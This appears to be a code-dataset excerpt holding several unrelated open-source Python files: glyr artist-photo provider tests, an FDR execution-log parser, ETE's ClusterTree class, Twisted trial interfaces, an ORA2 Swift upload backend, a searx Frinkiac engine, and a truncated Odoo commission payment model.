code stringlengths 2 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int32 2 1.05M |
|---|---|---|---|---|---|
#################################################################
# This file is part of glyr
# + a command-line tool and library to download various sort of music related metadata.
# + Copyright (C) [2011-2012] [Christopher Pahl]
# + Hosted at: https://github.com/sahib/glyr
#
# glyr is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# glyr is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with glyr. If not, see <http://www.gnu.org/licenses/>.
#################################################################
#!/usr/bin/env python
# encoding: utf-8
from tests.__common__ import *
# Query options shared by every provider's "not found" check: an artist
# query that should yield no results.  'album' and 'title' are deliberately
# supplied even though an artistphoto lookup does not use them, to check
# that they are ignored.
not_found_options = {
    'get_type': 'artistphoto',
    'artist': 'HorseTheBand',
    'album': 'Given, but not used.',
    'title': 'Accidentally given'
}

# One entry per artistphoto provider.  Each entry pairs a query expected to
# succeed (len_greater_0) with the shared not-found query (len_equal_0).
# The len_* predicates come from tests.__common__ via the wildcard import.
TESTCASES = [{
    # {{{
    'name': 'bbcmusic',
    'data': [{
        'options': {
            'get_type': 'artistphoto',
            'artist': 'The Rolling Stones'
        },
        'expect': len_greater_0
    }, {
        'options': not_found_options,
        'expect': len_equal_0
    }],
}, {
    # }}}
    # {{{
    'name': 'discogs',
    'data': [{
        'options': {
            'get_type': 'artistphoto',
            'artist': 'Nirvana'
        },
        'expect': len_greater_0
    }, {
        'options': not_found_options,
        'expect': len_equal_0
    }],
}, {
    # }}}
    # {{{
    'name': 'flickr',
    'data': [{
        'options': {
            'get_type': 'artistphoto',
            'artist': 'Die Ärzte'
        },
        'expect': len_greater_0
    }, {
        'options': not_found_options,
        'expect': len_equal_0
    }],
}, {
    # }}}
    # {{{
    'name': 'google',
    'data': [{
        'options': {
            'get_type': 'artistphoto',
            'artist': 'DeVildRiVeR'
        },
        'expect': len_greater_0
    }, {
        'options': not_found_options,
        'expect': len_equal_0
    }],
}, {
    # }}}
    # {{{
    'name': 'lastfm',
    'data': [{
        'options': {
            'get_type': 'artistphoto',
            'artist': 'Alestorm'
        },
        'expect': len_greater_0
    }, {
        'options': not_found_options,
        'expect': len_equal_0
    }],
}, {
    # }}}
    # {{{
    'name': 'singerpictures',
    'data': [{
        'options': {
            'get_type': 'artistphoto',
            'artist': 'Equilibrium'
        },
        'expect': len_greater_0
    }, {
        'options': not_found_options,
        'expect': len_equal_0
    }],
}, {
    # }}}
    # {{{
    'name': 'rhapsody',
    'data': [{
        'options': {
            'get_type': 'artistphoto',
            'artist': 'In Flames'
        },
        'expect': len_greater_0
    }, {
        'options': not_found_options,
        'expect': len_equal_0
    }],
}
]
| emillon/glyr-debian | spec/provider/tests/artistphoto.py | Python | gpl-3.0 | 3,340 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 TÜBİTAK UEKAE
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/copyleft/gpl.txt. | MehmetNuri/ozgurlukicin | beyin2/__init__.py | Python | gpl-3.0 | 188 |
# -*- coding: utf-8 -*-
from google.appengine.ext import vendor
# Tell App Engine that third-party libraries must be looked up in the
# local 'lib' folder.
vendor.add('lib')
| ButterFlyDevs/StudentsManagementSystem | SMS-Back-End/tdbms/appengine_config.py | Python | gpl-3.0 | 166 |
'''
Parse execution data log stream.
Allows access to selected parts of program memory at the time of recorded events.
'''
# Copyright (c) 2012-2013 Wladimir J. van der Laan
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sub license,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice (including the
# next paragraph) shall be included in all copies or substantial portions
# of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import print_function, division, unicode_literals
import os, sys, struct
from collections import namedtuple
from bisect import bisect_right
from binascii import b2a_hex
# struct byte-order prefixes (see the struct module format syntax)
LITTLE_ENDIAN = b'<'
BIG_ENDIAN = b'>'
# target architecture description
ENDIAN = LITTLE_ENDIAN
DEBUG = False  # set to True for a verbose trace of every record parsed
# Format characters for the primitive field types of the FDR stream.
RECTYPE_CHAR = b'B' # always 8 bit
MAGIC_CHAR = b'I' # always 32 bit
WORD_CHAR = b'I' # 32 bit
ADDR_CHAR = b'I' # 32/64 bit
SHORT_STRING_SIZE_CHAR = b'B'
# struct specifiers for decoding
RECTYPE_SPEC = struct.Struct(ENDIAN + RECTYPE_CHAR)
HDR_SPEC = struct.Struct(ENDIAN + MAGIC_CHAR + WORD_CHAR)  # file magic + version
WORD_SPEC = struct.Struct(ENDIAN + WORD_CHAR)
ADDR_SPEC = struct.Struct(ENDIAN + ADDR_CHAR)
RANGE_SPEC = struct.Struct(ENDIAN + ADDR_CHAR + ADDR_CHAR)  # (start, end) address pair
SHORT_STRING_SIZE_SPEC = struct.Struct(ENDIAN + SHORT_STRING_SIZE_CHAR)
# Expected header values for a valid FDR file.
FDR_MAGIC = 0x8e1aaa8f
FDR_VERSION = 1
class RTYPE:
    '''
    FDR record types (the one-byte tag that starts every record).
    '''
    RANGE_DATA = 0            # payload for a persistent (updated) range
    RANGE_TEMP_DATA = 1       # payload valid only until the next event
    ADD_UPDATED_RANGE = 2     # start tracking a memory range
    REMOVE_UPDATED_RANGE = 3  # stop tracking a memory range
    EVENT = 4                 # named event with parameters
    COMMENT = 5               # free-form comment
def read_spec(f, spec):
    """Read exactly ``spec.size`` bytes from *f* and unpack them.

    Returns the tuple produced by ``spec.unpack``; raises struct.error if
    the stream ends before a full record could be read.
    """
    raw = f.read(spec.size)
    return spec.unpack(raw)
def read_short_string(f):
    """Read a length-prefixed string: one size byte, then that many bytes."""
    (length,) = read_spec(f, SHORT_STRING_SIZE_SPEC)
    return f.read(length)
# An event record: a type string plus a dict mapping name -> Parameter.
Event = namedtuple('Event', ['event_type', 'parameters'])
# A free-form comment record embedded in the log stream.
Comment = namedtuple('Comment', ['data'])
# A single named event parameter (value is an address-sized integer).
Parameter = namedtuple('Parameter', ['name','value'])
class FDRLoader(object):
    '''
    High-level interface for playing back FDR files.

    The object is an iterable that returns event records:
    - Event(...) in case of an event
    - Comment(...) in case of a comment

    Also it can be subscripted to return the current contents of a memory
    range, like fdr[ptr:ptr+4] to return a range, or just fdr[ptr] to
    return one byte.  An IndexError will be raised if either the start or
    stop is out of range (or not up to date at the time of this event).
    '''
    def __init__(self, input_file):
        self.f = open(input_file, 'rb')
        # Validate the fixed file header (magic + format version).
        magic, version = read_spec(self.f, HDR_SPEC)
        if magic != FDR_MAGIC:
            raise ValueError('Magic value %08x not recognized (should be %08x)' % (magic, FDR_MAGIC))
        if version != FDR_VERSION:
            raise ValueError('Version %08x not recognized (should be %08x)' % (version, FDR_VERSION))
        # Stored memory ranges
        self.stored = []
        # Active memory ranges: sorted list of (start, end, bytearray)
        self.updated_ranges = []
        # Temporary data, only valid for the duration of a single event
        self.temp_ranges = []
        # Cached lists of starting addresses for bisection lookups.
        # IMPORTANT precondition: all ranges must be non-overlapping.
        self.updated_ranges_start = []
        self.temp_ranges_start = []

    def _flush_temps(self):
        '''Discard per-event temporary ranges (called after each event).'''
        self.temp_ranges = []
        self.temp_ranges_start = []

    def __iter__(self):
        '''Yield Event and Comment records as they appear in the stream.'''
        f = self.f
        while True:
            try:
                rt, = read_spec(f, RECTYPE_SPEC)
            except struct.error:  # could not parse entire structure; end of file allowed here
                break
            if rt == RTYPE.RANGE_DATA:
                addr_start, addr_end = read_spec(f, RANGE_SPEC)
                data = f.read(addr_end - addr_start)
                if DEBUG:
                    print('RANGE_DATA 0x%08x 0x%08x %s...' % (addr_start, addr_end, b2a_hex(data[0:16])))
                # TODO update self.stored
                self.update(addr_start, addr_end, data)
            elif rt == RTYPE.RANGE_TEMP_DATA:
                addr_start, addr_end = read_spec(f, RANGE_SPEC)
                data = f.read(addr_end - addr_start)
                if DEBUG:
                    print('RANGE_TEMP_DATA 0x%08x 0x%08x %s...' % (addr_start, addr_end, b2a_hex(data[0:16])))
                self.temp_ranges.append((addr_start, addr_end, data))
            elif rt == RTYPE.ADD_UPDATED_RANGE:
                addr_start, addr_end = read_spec(f, RANGE_SPEC)
                if DEBUG:
                    print('ADD_UPDATED_RANGE 0x%08x 0x%08x' % (addr_start, addr_end))
                # New ranges start zero-filled; keep both the range list and
                # the cached start-address list sorted for bisection.
                self.updated_ranges.append((addr_start, addr_end, bytearray(addr_end - addr_start)))
                self.updated_ranges.sort()
                self.updated_ranges_start = [r[0] for r in self.updated_ranges]
            elif rt == RTYPE.REMOVE_UPDATED_RANGE:
                addr_start, addr_end = read_spec(f, RANGE_SPEC)
                i = bisect_right(self.updated_ranges_start, addr_start) - 1
                if DEBUG:
                    print('REMOVE_UPDATED_RANGE 0x%08x 0x%08x (%i)' % (addr_start, addr_end, i))
                assert(self.updated_ranges[i][0] == addr_start and self.updated_ranges[i][1] == addr_end)
                del self.updated_ranges[i]
                # keep cached list of ranges up-to-date
                self.updated_ranges_start = [r[0] for r in self.updated_ranges]
            elif rt == RTYPE.EVENT:
                event_type = read_short_string(f)
                num_parameters, = read_spec(f, WORD_SPEC)
                parameters = {}
                for i in range(num_parameters):
                    par = Parameter(
                        name=read_short_string(f),
                        value=read_spec(f, ADDR_SPEC)[0])
                    parameters[par.name] = par
                # Make the temp ranges addressable for this event.
                self.temp_ranges.sort()
                self.temp_ranges_start = [r[0] for r in self.temp_ranges]
                if DEBUG:
                    # Build the debug string only when needed (it used to be
                    # built unconditionally), and use values() which exists
                    # on both Python 2 and 3 (itervalues() is 2.x-only).
                    parstr = ' '.join([('%s=0x%x' % par) for par in parameters.values()])
                    print('EVENT %s %s' % (event_type, parstr))
                yield Event(event_type, parameters)
                self._flush_temps()
            elif rt == RTYPE.COMMENT:
                size, = read_spec(f, ADDR_SPEC)
                comment = f.read(size)
                if DEBUG:
                    print('COMMENT')
                yield Comment(comment)
            else:
                raise ValueError('Unexpected record type %i' % rt)

    def __getitem__(self, key):
        '''
        Get one byte or a range of bytes from this memory map.
        Temporary (per-event) data takes precedence over updated ranges.
        '''
        # Support slicing as well as single lookups
        if isinstance(key, slice):
            start = key.start
            stop = key.stop
            if key.step is not None:
                raise KeyError('Extended slices not supported')
        else:
            start = key
            stop = key + 1
        try:
            return self.fetch(self.temp_ranges_start, self.temp_ranges, start, stop)
        except IndexError:
            # ('except IndexError,e' was Python-2-only syntax.)  Convert
            # explicitly because struct won't work with bytearray; bytes()
            # is identical to the former str() on Python 2 (where bytes is
            # str) and also correct on Python 3.
            return bytes(self.fetch(self.updated_ranges_start, self.updated_ranges, start, stop))

    def fetch(self, ranges_start, ranges, start, stop):
        '''Look up [start, stop) in stored or temp ranges.'''
        # XXX we don't handle the case of a request spanning multiple consecutive ranges
        idx = bisect_right(ranges_start, start) - 1
        if idx < 0:
            raise IndexError('Start address 0x%x out of range' % (start))
        (range_start, range_end, range_data) = ranges[idx]
        if stop > range_end:
            raise IndexError('End address 0x%x out of range (ends 0x%x)' % (stop, range_end))
        return range_data[start - range_start:stop - range_start]

    def update(self, start, stop, data):
        '''
        Update a stored memory range in place with new data.
        '''
        idx = bisect_right(self.updated_ranges_start, start) - 1
        if idx < 0:
            raise IndexError('Start address 0x%x out of range' % (start))
        (range_start, range_end, range_data) = self.updated_ranges[idx]
        if stop > range_end:
            raise IndexError('End address 0x%x out of range (ends 0x%x)' % (stop, range_end))
        range_data[start - range_start:stop - range_start] = data
| commshare/etna_viv | tools/etnaviv/parse_fdr.py | Python | gpl-3.0 | 9,109 |
# #START_LICENSE###########################################################
#
#
# This file is part of the Environment for Tree Exploration program
# (ETE). http://etetoolkit.org
#
# ETE is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ETE is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ETE. If not, see <http://www.gnu.org/licenses/>.
#
#
# ABOUT THE ETE PACKAGE
# =====================
#
# ETE is distributed under the GPL copyleft license (2008-2015).
#
# If you make use of ETE in published work, please cite:
#
# Jaime Huerta-Cepas, Joaquin Dopazo and Toni Gabaldon.
# ETE: a python Environment for Tree Exploration. Jaime BMC
# Bioinformatics 2010,:24doi:10.1186/1471-2105-11-24
#
# Note that extra references to the specific methods implemented in
# the toolkit may be available in the documentation.
#
# More info at http://etetoolkit.org. Contact: huerta@embl.de
#
#
# #END_LICENSE#############################################################
from __future__ import absolute_import
from __future__ import print_function
from sys import stderr
from . import clustvalidation
from ..coretype.tree import _translate_nodes
from .. import TreeNode, ArrayTable
from .. import numpy
from six.moves import range
__all__ = ["ClusterNode", "ClusterTree"]
class ClusterNode(TreeNode):
    """ Creates a new Cluster Tree object, which is a collection
    of ClusterNode instances connected in a hierarchical way, and
    representing a clustering result.

    a newick file or string can be passed as the first argument. An
    ArrayTable file or instance can be passed as a second argument.

    Examples:
      t1 = Tree() # creates an empty tree
      t2 = Tree( '(A:1,(B:1,(C:1,D:1):0.5):0.5);' )
      t3 = Tree( '/home/user/myNewickFile.txt' )
    """

    def _set_forbidden(self, value):
        # Setter shared by all read-only computed properties below.
        raise ValueError("This attribute can not be manually set.")

    def _get_intra(self):
        # All three cluster metrics are computed together, lazily.
        if self._silhouette is None:
            self.get_silhouette()
        return self._intracluster_dist

    def _get_inter(self):
        if self._silhouette is None:
            self.get_silhouette()
        return self._intercluster_dist

    def _get_silh(self):
        if self._silhouette is None:
            self.get_silhouette()
        return self._silhouette

    def _get_prof(self):
        if self._profile is None:
            self._calculate_avg_profile()
        return self._profile

    def _get_std(self):
        if self._std_profile is None:
            self._calculate_avg_profile()
        return self._std_profile

    def _set_profile(self, value):
        self._profile = value

    # Lazily computed cluster statistics; only 'profile' may be assigned.
    intracluster_dist = property(fget=_get_intra, fset=_set_forbidden)
    intercluster_dist = property(fget=_get_inter, fset=_set_forbidden)
    silhouette = property(fget=_get_silh, fset=_set_forbidden)
    profile = property(fget=_get_prof, fset=_set_profile)
    deviation = property(fget=_get_std, fset=_set_forbidden)

    def __init__(self, newick=None, text_array=None,
                 fdist=clustvalidation.default_dist):
        # Default dist is spearman_dist when scipy module is loaded
        # otherwise, it is set to euclidean_dist.

        # Initialize basic tree features and loads the newick (if any)
        TreeNode.__init__(self, newick)
        self._fdist = None
        self._silhouette = None
        self._intercluster_dist = None
        self._intracluster_dist = None
        self._profile = None
        self._std_profile = None

        # Cluster especific features
        self.features.add("intercluster_dist")
        self.features.add("intracluster_dist")
        self.features.add("silhouette")
        self.features.add("profile")
        self.features.add("deviation")

        # Initialize tree with array data
        if text_array:
            self.link_to_arraytable(text_array)

        if newick:
            self.set_distance_function(fdist)

    def __repr__(self):
        return "ClusterTree node (%s)" % hex(self.__hash__())

    def set_distance_function(self, fn):
        """ Sets the distance function used to calculate cluster
        distances and silouette index.

        ARGUMENTS:
          fn: a pointer to python function acepting two arrays (numpy) as
          arguments.

        EXAMPLE:
          # A simple euclidean distance
          my_dist_fn = lambda x,y: abs(x-y)
          tree.set_distance_function(my_dist_fn)
        """
        # Changing the metric invalidates every cached statistic.
        for n in self.traverse():
            n._fdist = fn
            n._silhouette = None
            n._intercluster_dist = None
            n._intracluster_dist = None

    def link_to_arraytable(self, arraytbl):
        """ Allows to link a given arraytable object to the tree
        structure under this node. Row names in the arraytable object
        are expected to match leaf names.

        Returns a list of nodes for with profiles could not been found
        in arraytable.
        """
        # Initialize tree with array data.  isinstance() accepts
        # ArrayTable subclasses too (the original type() equality check
        # would wrongly re-wrap them).
        if isinstance(arraytbl, ArrayTable):
            array = arraytbl
        else:
            array = ArrayTable(arraytbl)

        missing_leaves = []
        # Global min/max over all finite matrix values.
        matrix_values = [i for r in range(len(array.matrix))
                         for i in array.matrix[r] if numpy.isfinite(i)]
        array._matrix_min = min(matrix_values)
        array._matrix_max = max(matrix_values)

        for n in self.traverse():
            n.arraytable = array
            if n.is_leaf() and n.name in array.rowNames:
                n._profile = array.get_row_vector(n.name)
            elif n.is_leaf():
                # Leaf without a matching matrix row: all-NaN profile.
                n._profile = [numpy.nan] * len(array.colNames)
                missing_leaves.append(n)

        if missing_leaves:
            print("""[%d] leaf names could not be mapped to the matrix rows.""" %
                  len(missing_leaves), file=stderr)

        self.arraytable = array

    def iter_leaf_profiles(self):
        """ Returns an iterator over all the profiles associated to
        the leaves under this node."""
        for l in self.iter_leaves():
            yield l.get_profile()[0]

    def get_leaf_profiles(self):
        """ Returns the list of all the profiles associated to the
        leaves under this node."""
        return [l.get_profile()[0] for l in self.iter_leaves()]

    def get_silhouette(self, fdist=None):
        """ Calculates the node's silhouette value by using a given
        distance function. By default, euclidean distance is used. It
        also calculates the deviation profile, mean profile, and
        inter/intra-cluster distances.

        It sets the following features into the analyzed node:
           - node.intracluster
           - node.intercluster
           - node.silhouete

        intracluster distances a(i) are calculated as the Centroid
        Diameter

        intercluster distances b(i) are calculated as the Centroid
        linkage distance

        ** Rousseeuw, P.J. (1987) Silhouettes: A graphical aid to the
        interpretation and validation of cluster analysis.
        J. Comput. Appl. Math., 20, 53-65.
        """
        if fdist is None:
            fdist = self._fdist

        # Updates internal values
        self._silhouette, self._intracluster_dist, self._intercluster_dist = \
            clustvalidation.get_silhouette_width(fdist, self)
        # And returns them
        return self._silhouette, self._intracluster_dist, self._intercluster_dist

    def get_dunn(self, clusters, fdist=None):
        """ Calculates the Dunn index for the given set of descendant
        nodes.
        """
        if fdist is None:
            fdist = self._fdist
        nodes = _translate_nodes(self, *clusters)
        return clustvalidation.get_dunn_index(fdist, *nodes)

    def _calculate_avg_profile(self):
        """ This internal function updates the mean profile
        associated to an internal node. """
        # Updates internal values
        self._profile, self._std_profile = clustvalidation.get_avg_profile(self)
# cosmetic alias
#: .. currentmodule:: ete3
#
# Public name: ClusterTree is the user-facing alias of ClusterNode.
ClusterTree = ClusterNode
| Unode/ete | ete3/clustering/clustertree.py | Python | gpl-3.0 | 8,555 |
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Interfaces for Trial.
Maintainer: Jonathan Lange
"""
from __future__ import division, absolute_import
import zope.interface as zi
from zope.interface import Attribute
class ITestCase(zi.Interface):
    """
    The interface that a test case must implement in order to be used in Trial.
    """
    # NOTE: zope.interface method declarations intentionally omit 'self';
    # the bodies are documentation only and are never executed.

    failureException = zi.Attribute(
        "The exception class that is raised by failed assertions")

    def __call__(result):
        """
        Run the test. Should always do exactly the same thing as run().
        """

    def countTestCases():
        """
        Return the number of tests in this test case. Usually 1.
        """

    def id():
        """
        Return a unique identifier for the test, usually the fully-qualified
        Python name.
        """

    def run(result):
        """
        Run the test, storing the results in C{result}.

        @param result: A L{TestResult}.
        """

    def shortDescription():
        """
        Return a short description of the test.
        """
class IReporter(zi.Interface):
    """
    I report results from a run of a test suite.
    """
    # NOTE: zope.interface method declarations intentionally omit 'self'.

    stream = zi.Attribute(
        "Deprecated in Twisted 8.0. "
        "The io-stream that this reporter will write to")
    tbformat = zi.Attribute("Either 'default', 'brief', or 'verbose'")
    args = zi.Attribute(
        "Additional string argument passed from the command line")
    shouldStop = zi.Attribute(
        """
        A boolean indicating that this reporter would like the test run to stop.
        """)
    separator = Attribute(
        "Deprecated in Twisted 8.0. "
        "A value which will occasionally be passed to the L{write} method.")
    testsRun = Attribute(
        """
        The number of tests that seem to have been run according to this
        reporter.
        """)

    def startTest(method):
        """
        Report the beginning of a run of a single test method.

        @param method: an object that is adaptable to ITestMethod
        """

    def stopTest(method):
        """
        Report the status of a single test method

        @param method: an object that is adaptable to ITestMethod
        """

    def startSuite(name):
        """
        Deprecated in Twisted 8.0.

        Suites which wish to appear in reporter output should call this
        before running their tests.
        """

    def endSuite(name):
        """
        Deprecated in Twisted 8.0.

        Called at the end of a suite, if and only if that suite has called
        C{startSuite}.
        """

    def cleanupErrors(errs):
        """
        Deprecated in Twisted 8.0.

        Called when the reactor has been left in a 'dirty' state

        @param errs: a list of L{twisted.python.failure.Failure}s
        """

    def upDownError(userMeth, warn=True, printStatus=True):
        """
        Deprecated in Twisted 8.0.

        Called when an error occurs in a setUp* or tearDown* method

        @param warn: indicates whether or not the reporter should emit a
            warning about the error
        @type warn: Boolean

        @param printStatus: indicates whether or not the reporter should
            print the name of the method and the status
            message appropriate for the type of error
        @type printStatus: Boolean
        """

    def addSuccess(test):
        """
        Record that test passed.
        """

    def addError(test, error):
        """
        Record that a test has raised an unexpected exception.

        @param test: The test that has raised an error.
        @param error: The error that the test raised. It will either be a
            three-tuple in the style of C{sys.exc_info()} or a
            L{Failure<twisted.python.failure.Failure>} object.
        """

    def addFailure(test, failure):
        """
        Record that a test has failed with the given failure.

        @param test: The test that has failed.
        @param failure: The failure that the test failed with. It will
            either be a three-tuple in the style of C{sys.exc_info()}
            or a L{Failure<twisted.python.failure.Failure>} object.
        """

    def addExpectedFailure(test, failure, todo=None):
        """
        Record that the given test failed, and was expected to do so.

        In Twisted 15.5 and prior, C{todo} was a mandatory parameter.

        @type test: L{pyunit.TestCase}
        @param test: The test which this is about.

        @type failure: L{failure.Failure}
        @param failure: The error which this test failed with.

        @type todo: L{unittest.Todo}
        @param todo: The reason for the test's TODO status. If C{None}, a
            generic reason is used.
        """

    def addUnexpectedSuccess(test, todo=None):
        """
        Record that the given test succeeded, although it was expected to
        fail.

        In Twisted 15.5 and prior, C{todo} was a mandatory parameter.

        @type test: L{pyunit.TestCase}
        @param test: The test which this is about.

        @type todo: L{unittest.Todo}
        @param todo: The reason for the test's TODO status. If C{None}, a
            generic reason is used.
        """

    def addSkip(test, reason):
        """
        Record that a test has been skipped for the given reason.

        @param test: The test that has been skipped.
        @param reason: An object that the test case has specified as the reason
            for skipping the test.
        """

    def printSummary():
        """
        Deprecated in Twisted 8.0, use L{done} instead.

        Present a summary of the test results.
        """

    def printErrors():
        """
        Deprecated in Twisted 8.0, use L{done} instead.

        Present the errors that have occurred during the test run. This method
        will be called after all tests have been run.
        """

    def write(string):
        """
        Deprecated in Twisted 8.0, use L{done} instead.

        Display a string to the user, without appending a new line.
        """

    def writeln(string):
        """
        Deprecated in Twisted 8.0, use L{done} instead.

        Display a string to the user, appending a new line.
        """

    def wasSuccessful():
        """
        Return a boolean indicating whether all test results that were reported
        to this reporter were successful or not.
        """

    def done():
        """
        Called when the test run is complete.

        This gives the result object an opportunity to display a summary of
        information to the user. Once you have called C{done} on an
        L{IReporter} object, you should assume that the L{IReporter} object is
        no longer usable.
        """
| Architektor/PySnip | venv/lib/python2.7/site-packages/twisted/trial/itrial.py | Python | gpl-3.0 | 6,853 |
'''
Add in /edx/app/edxapp/edx-platform/lms/envs/aws.py:
ORA2_SWIFT_URL = AUTH_TOKENS["ORA2_SWIFT_URL"]
ORA2_SWIFT_KEY = AUTH_TOKENS["ORA2_SWIFT_KEY"]
Add in /edx/app/edxapp/lms.auth.json
"ORA2_SWIFT_URL": "https://EXAMPLE",
"ORA2_SWIFT_KEY": "EXAMPLE",
ORA2_SWIFT_KEY should correspond to Meta Temp-Url-Key configure in swift. Run
'swift stat -v' to get it.
'''
import logging
import urlparse
import requests
import swiftclient
from django.conf import settings
from ..exceptions import FileUploadInternalError
from .base import BaseBackend
logger = logging.getLogger("openassessment.fileupload.api")
# prefix paths with current version, in case we need to roll it at some point
SWIFT_BACKEND_VERSION = 1
class Backend(BaseBackend):
    """
    Upload openassessment student files to swift
    """

    def get_upload_url(self, key, content_type):
        """
        Return a signed temporary swift URL the client can PUT the file to.

        The path is prefixed with /v<SWIFT_BACKEND_VERSION>.  Note that
        content_type is accepted for interface compatibility but is not
        used when generating the URL.
        """
        bucket_name, key_name = self._retrieve_parameters(key)
        key, url = get_settings()
        try:
            temp_url = swiftclient.utils.generate_temp_url(
                path='/v%s%s/%s/%s' % (SWIFT_BACKEND_VERSION, url.path, bucket_name, key_name),
                key=key,
                method='PUT',
                seconds=self.UPLOAD_URL_TIMEOUT
            )
            return '%s://%s%s' % (url.scheme, url.netloc, temp_url)
        except Exception as ex:
            logger.exception(
                u"An internal exception occurred while generating an upload URL."
            )
            raise FileUploadInternalError(ex)

    def get_download_url(self, key):
        """
        Return a signed temporary GET URL for the object, or "" when a probe
        request to that URL does not answer 200 (e.g. object missing).
        """
        bucket_name, key_name = self._retrieve_parameters(key)
        key, url = get_settings()
        try:
            temp_url = swiftclient.utils.generate_temp_url(
                path='/v%s%s/%s/%s' % (SWIFT_BACKEND_VERSION, url.path, bucket_name, key_name),
                key=key,
                method='GET',
                seconds=self.DOWNLOAD_URL_TIMEOUT
            )
            download_url = '%s://%s%s' % (url.scheme, url.netloc, temp_url)
            response = requests.get(download_url)
            return download_url if response.status_code == 200 else ""
        except Exception as ex:
            logger.exception(
                u"An internal exception occurred while generating a download URL."
            )
            raise FileUploadInternalError(ex)

    def remove_file(self, key):
        """
        Delete the object via a signed DELETE URL; True when swift answers
        204 (deleted).
        """
        bucket_name, key_name = self._retrieve_parameters(key)
        key, url = get_settings()
        try:
            # NOTE(review): unlike get_upload_url/get_download_url, this path
            # omits the '/v<SWIFT_BACKEND_VERSION>' prefix -- confirm whether
            # deletes actually target the same objects the other methods
            # create before changing anything here.
            temp_url = swiftclient.utils.generate_temp_url(
                path='%s/%s/%s' % (url.path, bucket_name, key_name),
                key=key,
                method='DELETE',
                seconds=self.DOWNLOAD_URL_TIMEOUT)
            remove_url = '%s://%s%s' % (url.scheme, url.netloc, temp_url)
            response = requests.delete(remove_url)
            return response.status_code == 204
        except Exception as ex:
            logger.exception(
                u"An internal exception occurred while removing object on swift storage."
            )
            raise FileUploadInternalError(ex)
def get_settings():
    """
    Return the swift temp-url key and the parsed swift base URL.

    Both values are read from django settings (ORA2_SWIFT_URL and
    ORA2_SWIFT_KEY), defaulting to None when unset.
    """
    raw_url = getattr(settings, 'ORA2_SWIFT_URL', None)
    swift_key = getattr(settings, 'ORA2_SWIFT_KEY', None)
    return swift_key, urlparse.urlparse(raw_url)
| Stanford-Online/edx-ora2 | openassessment/fileupload/backends/swift.py | Python | agpl-3.0 | 3,388 |
"""
Frinkiac (Images)
@website https://www.frinkiac.com
@provide-api no
@using-api no
@results JSON
@stable no
@parse url, title, img_src
"""
from json import loads
from urllib import urlencode
categories = ['images']  # searx result category served by this engine
# All URLs are built from the frinkiac.com base.
BASE = 'https://frinkiac.com/'
# JSON search API endpoint
SEARCH_URL = '{base}api/search?{query}'
# Human-facing caption page used as the result link
RESULT_URL = '{base}?{query}'
# Per-frame thumbnail and full-size image, addressed by episode + timestamp
THUMB_URL = '{base}img/{episode}/{timestamp}/medium.jpg'
IMAGE_URL = '{base}img/{episode}/{timestamp}.jpg'
def request(query, params):
    """Fill in the outgoing search-API URL for *query* and return params."""
    encoded = urlencode({'q': query})
    params['url'] = SEARCH_URL.format(base=BASE, query=encoded)
    return params
def response(resp):
    """Turn the frinkiac JSON payload into searx image results."""
    items = []
    for entry in loads(resp.text):
        episode = entry['Episode']
        timestamp = entry['Timestamp']
        # Link to the caption page; thumbnail/image are frame snapshots.
        caption_query = urlencode({'p': 'caption', 'e': episode, 't': timestamp})
        items.append({
            'template': 'images.html',
            'url': RESULT_URL.format(base=BASE, query=caption_query),
            'title': episode,
            'content': '',
            'thumbnail_src': THUMB_URL.format(base=BASE, episode=episode, timestamp=timestamp),
            'img_src': IMAGE_URL.format(base=BASE, episode=episode, timestamp=timestamp),
        })
    return items
| matejc/searx | searx/engines/frinkiac.py | Python | agpl-3.0 | 1,303 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Original Module by SIESA (<http://www.siesacr.com>)
# Refactored by CLEARCORP S.A. (<http://clearcorp.co.cr>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# license, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
from openerp.osv import osv, fields
class Payment(osv.Model):
    """Commissions Payroll Payment"""
    _name = 'hr.payroll.pay.commission.payment'
    _description = __doc__

    def _check_amount_paid(self, cr, uid, ids, context=None):
        # Constraint helper: every payment must have a strictly positive
        # amount_paid (the check rejects 0.0).
        # NOTE(review): the constraint message below says "greater or equal
        # than 0", which contradicts this check -- confirm which rule is
        # intended before changing either side.
